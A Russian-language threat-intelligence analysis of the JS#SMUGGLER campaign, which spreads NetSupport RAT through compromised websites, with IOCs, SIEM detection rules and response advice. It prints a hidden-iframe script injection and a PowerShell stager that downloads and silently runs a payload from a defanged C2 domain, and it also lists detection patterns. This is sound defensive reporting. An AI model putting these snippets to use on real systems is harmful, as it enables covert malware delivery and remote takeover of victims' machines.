Кампания JS#SMUGGLER: продвинутая многоэтапная атака использует

NetSupport RAT

Кампания JS#SMUGGLER: продвинутая многоэтапная атака использует взломанные сайты для распространения NetSupport RAT

Исследователи в области информационной безопасности выявили сложную кампанию по распространению вредоносного ПО под названием JS#SMUGGLER, которая использует взломанные легитимные сайты для распространения NetSupport RAT. Данная кампания применяет таргетинг на основе типа устройства, сильно обфусцированные JavaScript-загрузчики и безфайловое выполнение, чтобы обходить средства защиты и обеспечивать постоянный удалённый доступ к системам жертв.


Понимание угрозы JS#SMUGGLER

Киберпространство столкнулось с появлением исключительно продвинутой вредоносной кампании, демонстрирующей качественный скачок в методах веб-атак. Кампания, получившая обозначение JS#SMUGGLER по классификации исследователей Securonix, демонстрирует следующие ключевые характеристики:

  • многоэтапную доставку полезной нагрузки,
  • адаптацию к окружению жертвы,
  • продвинутые механизмы антианализа,
  • устойчивость к современным средствам защиты.

В отличие от классических атак через фишинг и вредоносные вложения, JS#SMUGGLER использует взломанные легитимные сайты как векторы распространения, что:

  • значительно повышает вероятность заражения,
  • использует доверие пользователей к известным ресурсам,
  • сильно усложняет атрибуцию и блокировку инфраструктуры атакующих.

Кампания ориентирована преимущественно на корпоративных пользователей по всему миру, без жёсткой привязки к конкретным отраслям. Финальная полезная нагрузка — NetSupport RAT, предоставляющий атакующим:

  • полный удалённый контроль,
  • кражу учётных данных,
  • манипуляции с файлами,
  • эксфильтрацию данных.

Анатомия компрометации сайтов

Основа атаки — заражение легитимных сайтов, которые затем используются как точки распространения вредоносного кода.

Преимущество атаки Описание Влияние на обнаружение
Эксплуатация доверенных доменов Используются сайты с хорошей репутацией Высокое — обход фильтров URL
Корректные SSL-сертификаты Вредонос передаётся по HTTPS Высокое — выглядит как безопасный трафик
Сложность атрибуции Инфраструктура отделена от атакующих Среднее
Постоянное распространение Сайт работает легитимно и заражает Высокое
Эксплуатация доверия пользователей Вероятность клика выше Высокое

Методы взлома сайтов включают:

  • уязвимости CMS,
  • компрометацию админ-аккаунтов,
  • атаки на плагины,
  • SQL-инъекции.

Технический разбор многоэтапной цепочки заражения


Этап 1: Внедрение вредоносного JavaScript

При заходе на взломанный сайт пользователь незаметно получает скрытую загрузку через:

  • iframe,
  • JavaScript-редиректы.

Злоумышленники подгружают файл:

phone.js — с внешнего домена атакующих.

<script>
(function() {
  var iframe = document.createElement('iframe');
  iframe.style.display = 'none';
  iframe.src = 'https://attacker-domain[.]com/phone.js';
  document.body.appendChild(iframe);
})();
</script>

Этап 2: Профилирование устройства

JavaScript определяет тип устройства:

Критерий Мобильное устройство Десктоп
User-Agent Мобильная версия iframe Вторичный payload
Разрешение экрана Адаптация под мобильные экраны Минимальный визуальный след
Поддержка touch Включает сенсор Отслеживает мышь/клавиатуру
Возможности платформы Редирект HTA + PowerShell

Антианализ: вредонос запускается только при первом посещении.


Этап 3: Формирование HTA-загрузчика

HTA-файл запускается через mshta.exe:

Компонент Функция Маскировка
mshta.exe Исполнение HTA Легитимный бинар
Окно Скрывается Пользователь ничего не видит
PowerShell Записывается временно Следы минимальны
Выполнение В памяти Обход сигнатур
Самоуничтожение Удаляет файл Уничтожение артефактов

Этап 4: PowerShell-стейджер и загрузка NetSupport RAT

$url = "https://c2-domain[.]com/payload.bin"
$output = "$env:TEMP\service.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process $output -WindowStyle Hidden

Register-ScheduledTask -TaskName "SystemService"

Методы закрепления:

  • Autostart,
  • Scheduled Tasks,
  • Реестр.

NetSupport RAT — полный контроль над системой

Категория Возможности Риски
Удалённый доступ Полный контроль Захват станции
Кража данных Файлы, браузер, почта Утечки
Слежка Кейлоггер, камера, микрофон Шпионаж
Сеть Сканирование, прокси Расширение атаки
Загрузка вредоноса Ransomware, трояны Массовые заражения

⚠️ Критический риск: любая система с NetSupport RAT считается полностью скомпрометированной.


Атрибуция и Threat Intelligence

Параметр Значение
Актор SmartApeSG
Альтернативные имена HANEYMANEY, ZPHP
Первое появление Конец 2024
Методы JavaScript-инъекции, RAT
Инфраструктура boriver[.]com
Мотивация Финансовая
Уровень Высокий

Связанная кампания CHAMELEON#NET

Фактор JS#SMUGGLER CHAMELEON#NET
Вектор Взломанные сайты Фишинг
Начальный этап phone.js BZ2 архив
Промежуточный HTA VB.NET
Финал NetSupport RAT Formbook
Методы Fileless Reflective
Цели Корпорации Соцсектор

IOC — индикаторы компрометации

Тип Значение Контекст Уверенность
Домен boriver[.]com Распространение Высокая
Файл phone.js JS-загрузчик Высокая
Процесс mshta.exe HTA Средняя
Поведение mshta → PowerShell Цепочка атаки Высокая
Планировщик System Task Закрепление Средняя
Сеть 5400/5405/443 C2 Высокая

Detection & Hunting-правила (SIEM/EDR)

ParentImage ENDS_WITH "mshta.exe"
AND Image ENDS_WITH "powershell.exe"

CommandLine CONTAINS "windowstyle hidden"

EventID == 4698 AND TaskName CONTAINS "System"

NetworkConnection AND DestinationPort IN (5400, 5405, 443)

Защита сайтов от компрометации

  • регулярные обновления CMS,
  • MFA для админов,
  • File Integrity Monitoring,
  • Pentest и аудит,
  • Subresource Integrity,
  • WAF и CSP.

Реагирование на инциденты

Фаза Действия Срок
Изоляция Отключение, блокировка IOC 30 мин
Масштаб Определение всех заражённых 2 ч
Форензика Дампы, образы 4 ч
Удаление Чистка, патчи 24 ч
Восстановление Backup, reset 48 ч
Post-mortem Анализ, улучшения 7 дней

Стратегические рекомендации

  • Zero Trust,
  • Threat Intelligence,
  • SOAR,
  • User awareness,
  • Proactive Vulnerability Management.

Эволюция веб-малвари

  • уход от email к сайтам,
  • device-aware вредонос,
  • fileless-атаки,
  • злоупотребление легитимными RAT,
  • многоэтапные цепочки.

Вывод

Кампания JS#SMUGGLER демонстрирует новый уровень веб-атак, где:

  • сайт становится оружием,
  • легитимные инструменты — инструментом взлома,
  • присутствие RAT означает полный захват.

Эта кампания — сигнал для бизнеса, что:

взлом сегодня начинается не с письма, а с браузера.